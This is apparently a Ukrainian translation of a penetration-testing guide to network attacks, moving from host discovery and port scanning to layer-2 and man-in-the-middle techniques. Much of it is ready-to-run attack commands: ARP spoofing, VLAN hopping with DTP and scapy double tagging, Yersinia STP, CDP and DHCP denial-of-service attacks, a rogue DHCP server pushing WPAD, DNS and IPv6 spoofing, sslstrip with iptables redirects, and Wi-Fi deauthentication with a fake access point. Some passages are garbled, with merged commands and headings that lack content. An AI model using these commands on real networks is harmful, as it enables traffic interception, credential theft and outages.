Як виявити активні IP-адреси в Інтернеті. Практичний посібник

Комплексне керівництво з тестування мережевої безпеки. Розглядаються різні методи та інструменти, необхідні для ефективного проведення пентестинга сетей. Основна увага передбачає виявлення хостів як із зовнішньої, так і з внутрішньої сторони мережі, а також різними техніками сканування портів і служб.

Мережа пентестування

Це буде короткий розділ про те, як знайти IP-адреси, що відповідають з Інтернету . У цій ситуації у вас є певний діапазон IP-адрес (можливо, навіть кілька діапазонів ), і вам просто потрібно знайти, які IP-адреси відповідають .

ICMP

Це найпростіший і найшвидший спосіб дізнатися, чи працює хост чи ні. Ви можете спробувати надіслати пакети ICMP і очікувати відповіді . Найпростіший спосіб – просто надіслати ехо-запит і очікувати від нього відповіді. Ви можете зробити це за допомогою простого pingабо використання fpingfor ranges . Ви також можете використовувати nmap для надсилання інших типів пакетів ICMP (це дозволить уникнути фільтрів для загального ICMP ехо-запиту-відповіді).

ping -c 1 199.66.11.4    # 1 echo request to a host
fping -g 199.66.11.0/24  # Send echo requests to ranges
nmap -PE -PM -PP -sn -n 199.66.11.0/24 #Send echo, timestamp requests and subnet mask requests

Виявлення порту TCP

Дуже часто можна виявити, що всі типи пакетів ICMP фільтруються. Тоді все, що ви можете зробити, щоб перевірити, чи хост працює, це спробувати знайти відкриті порти . Кожен хост має 65535 портів , тому, якщо у вас “великий” діапазон, ви не можете перевірити, чи відкритий кожен порт кожного хоста чи ні, це займе надто багато часу. Тоді вам потрібен швидкий сканер портів ( masscan ) і список найбільш використовуваних портів:

#Using masscan to scan top20ports of nmap in a /24 range (less than 5min)
masscan -p20,21-23,25,53,80,110,111,135,139,143,443,445,993,995,1723,3306,3389,5900,8080 199.66.11.0/24

Ви також можете виконати цей крок за допомогою nmap, але він повільніший і nmapмає деякі проблеми з ідентифікацією хостів.

Виявлення портів HTTP

Це просто виявлення порту TCP, корисне, коли ви хочете зосередитися на виявленні служб HTTP :

masscan -p80,443,8000-8100,8443 199.66.11.0/24

Виявлення порту UDP

Ви також можете спробувати перевірити, чи відкритий порт UDP , щоб вирішити, чи варто приділяти більше уваги хосту . Оскільки служби UDP зазвичай не відповідають жодними даними на звичайний порожній тестовий пакет UDP, важко сказати, чи порт фільтрується чи відкритий. Найпростіший спосіб вирішити це – надіслати пакет, пов’язаний із запущеною службою, і оскільки ви не знаєте, яка служба запущена, вам слід спробувати найбільш ймовірну на основі номера порту:

nmap -sU -sV --version-intensity 0 -F -n 199.66.11.53/24
# The -sV will make nmap test each possible known UDP service packet
# The "--version-intensity 0" will make nmap only test the most probable

Рядок nmap, запропонований раніше, тестуватиме 1000 найкращих портів UDP на кожному хості в межах діапазону /24 , але навіть це займе більше 20 хвилин . Якщо потрібні найшвидші результати , ви можете використати udp-proto-scanner : ./udp-proto-scanner.pl 199.66.11.53/24це надішле ці UDP-зонди до очікуваного порту (для діапазону /24 це займе лише 1 хвилину): DNSStatusRequest, DNSVersionBindReq, NBTStat, NTPRequest, RPCCheck, SNMPv3GetRequest, chargen , citrix, daytime, db2, echo, gtpv1, ike, ms-sql, ms-sql-slam, netop, ntp, rpc, snmp-public, systat, tftp, час, xdmcp.

Виявлення порту SCTP

#Probably useless, but it's pretty fast, why not trying?
nmap -T4 -sY -n --open -Pn <IP/range>

Виявлення господарів зсередини

Якщо ви перебуваєте всередині мережі, одна з перших речей, яку ви захочете зробити, це виявити інші хости . Залежно від того, скільки шуму ви можете/бажаєте зробити, можна виконувати різні дії:

Ви можете використовувати ці інструменти для пасивного виявлення хостів у підключеній мережі:

netdiscover -p
p0f -i eth0 -p -o /tmp/p0f.log
# Bettercap
net.recon on/off #Read local ARP cache periodically
net.show
set net.show.meta true #more info

Зауважте, що методи, прокоментовані в розділі Виявлення хостів ззовні ( TCP/HTTP/UDP/SCTP Port Discovery ), також можна застосувати тут . Але оскільки ви перебуваєте в одній мережі з іншими хостами, ви можете робити більше речей :

#ARP discovery
nmap -sn <Network> #ARP Requests (Discover IPs)
netdiscover -r <Network> #ARP requests (Discover IPs)

#NBT discovery
nbtscan -r 192.168.0.1/24 #Search in Domain

# Bettercap
net.probe on/off #Discover hosts on current subnet by probing with ARP, mDNS, NBNS, UPNP, and/or WSD
set net.probe.mdns true/false #Enable mDNS discovery probes (default=true)
set net.probe.nbns true/false #Enable NetBIOS name service discovery probes (default=true)
set net.probe.upnp true/false #Enable UPNP discovery probes (default=true)
set net.probe.wsd true/false #Enable WSD discovery probes (default=true)
set net.probe.throttle 10 #10ms between probes sent (default=10)

#IPv6
alive6 <IFACE> # Send a pingv6 to multicast.

Активний ICMP

Wake On Lan

Wake On Lan використовується для ввімкнення комп’ютерів за допомогою мережевого повідомлення . Чарівний пакет, який використовується для ввімкнення комп’ютера, — це лише пакет, у якому надається MAC Dst , а потім він повторюється 16 разів у тому самому пакеті. Тоді такі пакети зазвичай надсилаються в Ethernet 0x0842 або в UDP-пакеті на порт 9 . Якщо [MAC] не надано, пакет надсилається до широкомовної мережі Ethernet (і буде повторюватися широкомовний MAC).

# Bettercap (if no [MAC] is specificed ff:ff:ff:ff:ff:ff will be used/entire broadcast domain)
wol.eth [MAC] #Send a WOL as a raw ethernet packet of type 0x0847
wol.udp [MAC] #Send a WOL as an IPv4 broadcast packet to UDP port 9

Сканування хостів

Після того, як ви виявите всі IP-адреси (зовнішні чи внутрішні), які хочете детально сканувати, можна виконувати різні дії.

TCP

# Nmap fast scan for the most 1000tcp ports used
nmap -sV -sC -O -T4 -n -Pn -oA fastscan <IP> 
# Nmap fast scan for all the ports
nmap -sV -sC -O -T4 -n -Pn -p- -oA fullfastscan <IP> 
# Nmap fast scan for all the ports slower to avoid failures due to -T4
nmap -sV -sC -O -p- -n -Pn -oA fullscan <IP>

#Bettercap Scan
syn.scan 192.168.1.0/24 1 10000 #Ports 1-10000

# Check if any of the most common udp services is running
udp-proto-scanner.pl <IP> 
# Nmap fast check if any of the 100 most common UDP services is running
nmap -sU -sV --version-intensity 0 -n -F -T4 <IP>
# Nmap check if any of the 100 most common UDP services is running and launch defaults scripts
nmap -sU -sV -sC -n -F -T4 <IP> 
# Nmap "fast" top 1000 UDP ports
nmap -sU -sV --version-intensity 0 -n -T4 <IP>
# You could use nmap to test all the UDP ports, but that will take a lot of time

# Nmap fast SCTP scan
nmap -T4 -sY -n -oA SCTFastScan <IP>
# Nmap all SCTP scan
nmap -T4 -p- -sY -sV -sC -F -n -oA SCTAllScan <IP>

tcpdump –nt -i eth2 src net 10 or 172.16/12 or 192.168/16
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth2, link-type EN10MB (Ethernet), capture size 65535 bytes
IP 10.10.0.1 > 185.22.224.18: ICMP echo reply, id 25804, seq 1582, length 64
IP 10.10.0.2 > 185.22.224.18: ICMP echo reply, id 25804, seq 1586, length 64

sudo tcpdump -i <INTERFACE> udp port 53 #Listen to DNS request to discover what is searching the host
tcpdump -i <IFACE> icmp #Listen to icmp packets
sudo bash -c "sudo nohup tcpdump -i eth0 -G 300 -w \"/tmp/dump-%m-%d-%H-%M-%S-%s.pcap\" -W 50 'tcp and (port 80 or port 443)' &"

ssh user@<TARGET IP> tcpdump -i ens160 -U -s0 -w - | sudo wireshark -k -i -
ssh <USERNAME>@<TARGET IP> tcpdump -i <INTERFACE> -U -s0 -w - 'port not 22' | sudo wireshark -k -i - # Exclude SSH traffic

net.sniff on
net.sniff stats
set net.sniff.output sniffed.pcap #Write captured packets to file
set net.sniff.local  #If true it will consider packets from/to this computer, otherwise it will skip them (default=false)
set net.sniff.filter #BPF filter for the sniffer (default=not arp)
set net.sniff.regexp #If set only packets matching this regex will be considered

arp.spoof on
set arp.spoof.targets <IP> #Specific targets to ARP spoof (default=<entire subnet>)
set arp.spoof.whitelist #Specific targets to skip while spoofing
set arp.spoof.fullduplex true #If true, both the targets and the gateway will be attacked, otherwise only the target (default=false)
set arp.spoof.internal true #If true, local connections among computers of the network will be spoofed, otherwise only connections going to and coming from the Internet (default=false)

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -t 192.168.1.1 192.168.1.2
arpspoof -t 192.168.1.2 192.168.1.1

macof -i <interface>

apt-get install yersinia #Installation
sudo apt install kali-linux-large #Another way to install it in Kali
yersinia -I #Interactive mode
#In interactive mode you will need to select a interface first
#Then, you can select the protocol to attack using letter "g"
#Finally, you can select the attack using letter "x"

yersinia -G #For graphic mode

Щоб перерахувати VLAN, також можна створити кадр DTP Desirable за допомогою сценарію DTPHijacking.py . Ні за яких обставин не переривайте сценарій. Він вводить DTP Desirable кожні три секунди. Динамічно створювані магістральні канали на комутаторі працюють лише п’ять хвилин. Через п’ять хвилин стовбур відвалюється.

sudo python3 DTPHijacking.py --interface eth0

Я хотів би зазначити, що Access/Desirable (0x03) вказує на те, що кадр DTP має бажаний тип, який повідомляє порту про перемикання в режим Trunk. А 802.1Q/802.1Q (0xa5 ) вказує на тип інкапсуляції 802.1Q .

Аналізуючи кадри STP, ми дізнаємося про існування VLAN 30 і VLAN 60.

Атака на певні VLAN

Коли вам відомі значення ідентифікаторів VLAN та IP-адрес, ви можете налаштувати віртуальний інтерфейс для атаки на певну VLAN . Якщо DHCP недоступний, використовуйте ifconfig , щоб встановити статичну IP-адресу.

root@kali:~# modprobe 8021q
root@kali:~# vconfig add eth1 250
Added VLAN with VID == 250 to IF -:eth1:-
root@kali:~# dhclient eth1.250
Reloading /etc/samba/smb.conf: smbd only.
root@kali:~# ifconfig eth1.250
eth1.250  Link encap:Ethernet  HWaddr 00:0e:c6:f0:29:65
          inet addr:10.121.5.86  Bcast:10.121.5.255  Mask:255.255.255.0
          inet6 addr: fe80::20e:c6ff:fef0:2965/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:19 errors:0 dropped:0 overruns:0 frame:0
          TX packets:13 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:2206 (2.1 KiB)  TX bytes:1654 (1.6 KiB)

root@kali:~# arp-scan -I eth1.250 10.121.5.0/24

# Another configuration example
modprobe 8021q
vconfig add eth1 20
ifconfig eth1.20 192.168.1.2 netmask 255.255.255.0 up

# Another configuration example
sudo vconfig add eth0 30
sudo ip link set eth0.30 up
sudo dhclient -v eth0.30

Автоматичний бункер VLAN

Обговорювана атака динамічного транкінгу та створення віртуальних інтерфейсів для виявлення хостів в інших мережах VLAN автоматично виконується інструментом: https://github.com/nccgroup/vlan-hopping—frogger

Подвійне тегування

Якщо зловмисник знає значення MAC-адреси, IP-адреси та ідентифікатора VLAN хоста-жертви , він може спробувати подвійно позначити кадр за допомогою його призначеної VLAN і VLAN жертви та надіслати пакет. Оскільки жертва не зможе з’єднатися зі зловмисником, найкращим варіантом для зловмисника є зв’язок через UDP із протоколами, які можуть виконувати деякі цікаві дії (наприклад, SNMP).

Іншим варіантом для зловмисника є запуск сканування TCP-порту з підробкою IP-адреси, контрольованої зловмисником і доступною для жертви (ймовірно, через Інтернет). Тоді зловмисник може пронюхати другий хост, який йому належить, якщо він отримує пакети від жертви.

Щоб виконати цю атаку, ви можете використовувати scapy: pip install scapy

from scapy.all import *
# Double tagging with ICMP packet (the response from the victim isn't double tagged so it will never reach the attacker)
packet = Ether()/Dot1Q(vlan=1)/Dot1Q(vlan=20)/IP(dst='192.168.1.10')/ICMP()
sendp(packet)

Бічний обхід сегментації VLAN

Якщо у вас є доступ до комутатора, до якого ви безпосередньо підключені , ви можете обійти сегментацію VLAN у мережі. Просто перемкніть порт у режим магістралі (інакше відомий як транк), створіть віртуальні інтерфейси з ідентифікаторами цільових VLAN і налаштуйте IP-адресу. Ви можете спробувати запитати адресу динамічно (DHCP) або налаштувати її статично. Це залежить від випадку.

Обхід приватної VLAN рівня 3

У певних середовищах, наприклад у гостьових бездротових мережах, реалізовано параметри ізоляції портів (також відомі як приватна VLAN), щоб запобігти безпосередньому спілкуванню один з одним клієнтами, підключеними до бездротової точки доступу. Однак було виявлено техніку, яка може обійти ці заходи ізоляції. Ця техніка використовує або відсутність мережевих ACL, або їх неправильну конфігурацію, дозволяючи маршрутизувати IP-пакети через маршрутизатор для досягнення іншого клієнта в тій же мережі.

Атака виконується шляхом створення пакету, який містить IP-адресу кінцевого клієнта, але з MAC-адресою маршрутизатора . Це призводить до того, що маршрутизатор помилково пересилає пакет цільовому клієнту. Цей підхід схожий на той, що використовується в атаках із подвійним тегом, де можливість контролювати доступний для жертви хост використовується для використання недоліку безпеки.

Основні етапи атаки:

%% yersinia -G # Launch Yersinia in graphical mode ```

yersinia stp -attack 2
yersinia stp -attack 3
#Use -M to disable MAC spoofing

yersinia stp -attack 1 #Will send 1 TCP packet and the switch should restore the CAM in 15 seconds
yersinia stp -attack 0 #Will send 1 CONF packet, nothing else will happen

yersinia stp -attack 4 #Behaves like the root switch
yersinia stp -attack 5 #This will make the device behaves as a switch but will not be root

yersinia stp -attack 6 #This will cause a DoS as the layer 2 packets wont be forwarded. You can use Ettercap to forward those packets "Sniff" --> "Bridged sniffing"
ettercap -T -i eth1 -B eth2 -q #Set a bridge between 2 interfaces to forwardpackages

sudo yersinia cdp -attack 1 # Initiates a DoS attack by simulating fake CISCO devices
# Alternatively, for a GUI approach:
sudo yersinia -G

sudo yersinia cdp -attack 2 #Simulate a new CISCO device
sudo yersinia cdp -attack 0 #Send a CDP packet

voiphopper -i eth1 -E 'SEP001EEEEEEEEE ' -c 2

nmap --script broadcast-dhcp-discover
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-16 05:30 EDT
WARNING: No targets were specified, so 0 hosts scanned.
Pre-scan script results:
| broadcast-dhcp-discover: 
|   Response 1 of 1: 
|     IP Offered: 192.168.1.250
|     DHCP Message Type: DHCPOFFER
|     Server Identifier: 192.168.1.1
|     IP Address Lease Time: 1m00s
|     Subnet Mask: 255.255.255.0
|     Router: 192.168.1.1
|     Domain Name Server: 192.168.1.1
|_    Domain Name: mynet
Nmap done: 0 IP addresses (0 hosts up) scanned in 5.27 seconds

yersinia dhcp -attack 1
yersinia dhcp -attack 3 #More parameters are needed

# Example to start a rogue DHCP server with specified options
!python /usr/share/responder/DHCP.py -i 10.0.0.100 -d example.org -r 10.0.0.1 -p 10.0.0.100 -s 10.0.0.1 -n 255.255.255.0 -I eth1 -w "http://10.0.0.100/wpad.dat" -S -R

Атаки EAP

Ось деякі з тактик атаки, які можна використовувати проти реалізацій 802.1X:

eapmd5pass –r pcap.dump –w /usr/share/wordlist/sqlmap.txt

Ettercap
yersinia dhcp -attack 2 #More parameters are needed

Ettercap
icmp_redirect
hping3 [VICTIM IP ADDRESS] -C 5 -K 1 -a [VICTIM DEFAULT GW IP ADDRESS] --icmp-gw [ATTACKER IP ADDRESS] --icmp-ipdst [DST IP ADDRESS] --icmp-ipsrc [VICTIM IP ADDRESS] #Send icmp to [1] form [2], route to [3] packets sent to [4] from [5]

set dns.spoof.hosts ./dns.spoof.hosts; dns.spoof on

apt-get install dnsmasqecho "addn-hosts=dnsmasq.hosts" > dnsmasq.conf #Create dnsmasq.confecho "127.0.0.1   domain.example.com" > dnsmasq.hosts #Domains in dnsmasq.hosts will be the domains resolved by the Dsudo dnsmasq -C dnsmasq.conf --no-daemon
dig @localhost domain.example.com # Test the configured DNS

root@kali:~# git clone https://github.com/pentestmonkey/gateway-finder.git
root@kali:~# cd gateway-finder/
root@kali:~# arp-scan -l | tee hosts.txt
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.6 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 
10.0.0.100     00:13:72:09:ad:76       Dell Inc.
10.0.0.200     00:90:27:43:c0:57       INTEL CORPORATION
10.0.0.254     00:08:74:c0:40:ce       Dell Computer Corp.

root@kali:~/gateway-finder# ./gateway-finder.py -f hosts.txt -i 209.85.227.99
gateway-finder v1.0 http://pentestmonkey.net/tools/gateway-finder
[+] Using interface eth0 (-I to change)
[+] Found 3 MAC addresses in hosts.txt
[+] We can ping 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]
[+] We can reach TCP port 80 on 209.85.227.99 via 00:13:72:09:AD:76 [10.0.0.100]

sudo parasite6 -l eth0 # This option will respond to every requests spoofing the address that was requested
sudo fake_advertise6 -r -w 2 eth0 <Router_IPv6> #This option will send the Neighbor Advertisement packet every 2 seconds

sysctl -w net.ipv6.conf.all.forwarding=1 4
ip route add default via <ROUTER_IPv6> dev wlan0
fake_router6 wlan0 fe80::01/16

dhcp6.spoof on
dhcp6.spoof.domains <list of domains>

mitm6

apt-get install sslstrip
sslstrip -w /tmp/sslstrip.log --all - l 10000 -f -k
#iptables --flush
#iptables --flush -t nat
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
iptables -A INPUT -p tcp --destination-port 10000 -j ACCEPT

Прослуховування TCP у порту

sudo nc -l -p 80
socat TCP4-LISTEN:80,fork,reuseaddr -

TCP + SSL прослуховує порт

FILENAME=server
# Generate a public/private key pair:
openssl genrsa -out $FILENAME.key 1024
# Generate a self signed certificate:
openssl req -new -key $FILENAME.key -x509 -sha256 -days 3653 -out $FILENAME.crt
# Generate the PEM file by just appending the key and certificate files:
cat $FILENAME.key $FILENAME.crt >$FILENAME.pem

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0 -

sudo socat -v -v openssl-listen:443,reuseaddr,fork,cert=$FILENAME.pem,cafile=$FILENAME.crt,verify=0  openssl-connect:[SERVER]:[PORT],verify=0

# Events
events.stream off #Stop showing events
events.show #Show all events
events.show 5 #Show latests 5 events 
events.clear

# Ticker (loop of commands)
set ticker.period 5; set ticker.commands "wifi.deauth DE:AD:BE:EF:DE:AD"; ticker on

# Caplets
caplets.show
caplets.update

# Wifi
wifi.recon on
wifi.deauth BSSID
wifi.show
# Fake wifi
set wifi.ap.ssid Banana
set wifi.ap.bssid DE:AD:BE:EF:DE:AD
set wifi.ap.channel 5
set wifi.ap.encryption false #If true, WPA2
wifi.recon on; wifi.ap